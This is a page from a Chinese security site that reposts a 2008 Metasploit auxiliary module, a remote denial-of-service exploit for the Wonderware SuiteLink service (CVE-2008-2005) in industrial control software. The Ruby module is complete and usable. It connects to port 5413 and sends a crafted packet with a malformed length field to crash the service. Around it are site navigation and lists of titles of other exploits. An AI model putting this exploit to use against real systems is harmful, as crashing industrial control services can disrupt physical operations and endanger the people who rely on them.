首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WonderWare SuiteLink 2.0 Remote Denial of Service Exploit (meta)
来源:www.vfcocus.net 作者:belay tows 发布时间:2008-09-18  
##
# $Id: suitlink.rb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary

include Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name'           => 'Wonderware SuitLink Denial of Service',
'Description'    => %q{
This module exploits a denial of service vulnerability
within the SuitLink service in Wonderware products.
},
'Author'         => [ 'belay tows' ],
'License'        => MSF_LICENSE,
'Version'        => '$Revision: 1 $',
'References'     =>
[
[ 'BID', '28974' ],
[ 'CVE', '2008-2005' ],
],
'DisclosureDate' => 'May 05 2008'))

register_options([Opt::RPORT(5413),], self.class)
end

def run
connect

print_status("Sending DoS packet...")

        dos_length = 0xBAADF00D

pkt =  "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F"
pkt << Rex::Text.rand_text_alpha(0x14) + "\x00\x00"
        pkt << [dos_length].pack("V")

        len = [pkt.length].pack("C")
sock.put(len)

sock.put(pkt)

        sleep 15 # wait to avoid thread shutdown event

disconnect
end

end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Postfix < 2.4.9, 2.5.5, 2.6-20
·Cisco Router HTTP Administrati
·QuickTime 7.5.5 / ITunes 8.0 R
·Cisco Router HTTP Administrati
·Femitter FTP Server 1.03 (RETR
·addalink <= 4 Arbitrary Admin
·NuMedia Soft NMS DVD Burning S
·Pluck 4.5.3 (update.php) Remot
·MS Windows WRITE_ANDX SMB comm
·DESlock+ <= 3.2.7 Local Kernel
·CzarNews <= 1.20 (Cookie) Remo
·DESlock+ <= 3.2.7 Local Kernel
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved